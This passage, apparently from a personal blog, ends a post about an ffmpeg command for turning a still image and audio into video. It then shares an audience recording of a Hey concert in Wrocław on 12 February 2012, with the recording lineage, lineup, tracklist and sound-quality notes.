ffmpeg -loop 1 -r 5 -i $IMAGE_FILE -i $AUDIO_FILE -c:v libx264 -preset slow -crf 18 -tune stillimage -c:a aac \
    -b:a 384k -filter:v "[in] scale=-1:720, pad=1280:720:640-iw/2 [out]" -shortest output.mp4
```

Hope you found this useful,
D.K.


## Hey 2012-02-12 Klub Eter, Wrocław [FLAC/MP3]

The concert was absolutely phenomenal. I recommend that all fans of the band download the recording, and especially listen to what is, in my humble opinion, a magnificent version of „Mimo wszystko”.

The recording is available in MP3-V2 (on mediafire) and FLAC (as a torrent).

Info :

Hey
12 February 2012
Klub Eter, Wrocław
Audience Recording
Lineage : Church Audio CAFS > Tascam DR-07 (24bit/48kHz) > Sound Forge 10
(normalization, conversion to 16bit/44.1kHz, track splitting) >
FLAC v1.2.1 (-V -8) > foobar2000 v1.1.11 (tagging, ReplayGain scanning)
Lineup :
Katarzyna Nosowska - vocals
Paweł Krawczyk - guitar, trombone, backup vocals
Marcin Żabiełowicz - guitar
Jacek Chrzanowski - bass
Robert Ligiewicz - drums
Tracklisting :
01 - Fate [3:04]
02 - Muka [3:37]
03 - Umieraj stąd [3:55]
04 - A Ty? [3:47]
05 - That's a Lie [3:58]
06 - [sic!] [3:46]
07 - Cudzoziemka w raju kobiet [3:33]
08 - Piersi ćwierć [5:02]
09 - Miłość! Uwaga! Ratunku! Pomocy! [4:40]
10 - Faza delta [4:37]
11 - Z rejestru strasznych snów [3:23]
12 - Mimo wszystko [4:03]
13 - Stygnę [5:14]
14 - Teksański [2:59]
15 - Luli lali [4:41]
16 - Kto tam? Kto jest w środku? [3:30]
17 - Zazdrość [2:06]
18 - Vanitas [5:17]
19 - encore break [2:11]
20 - Boję się o nas [5:17]
21 - Cisza, ja i czas [3:28]
22 - Schizophrenic Family [2:36]
23 - Moja i Twoja nadzieja [4:27]
Info :
A concert from the 2012 winter tour by Hey. Very good setlist. Unfortunately, I
was a bit too late to get a good place and I was standing in a rather chatty
crowd, which unfortunately shows in the quieter passages and songs. There is
also a cut in "Kto tam? Kto jest w środku?" around 2:53 - sadly, it comes from
the master. The recording is rather good overall, so I hope you can enjoy it.
Please don't sell this recording in any form.
Enjoy!
-X

If the link or the torrent expires, please contact me.
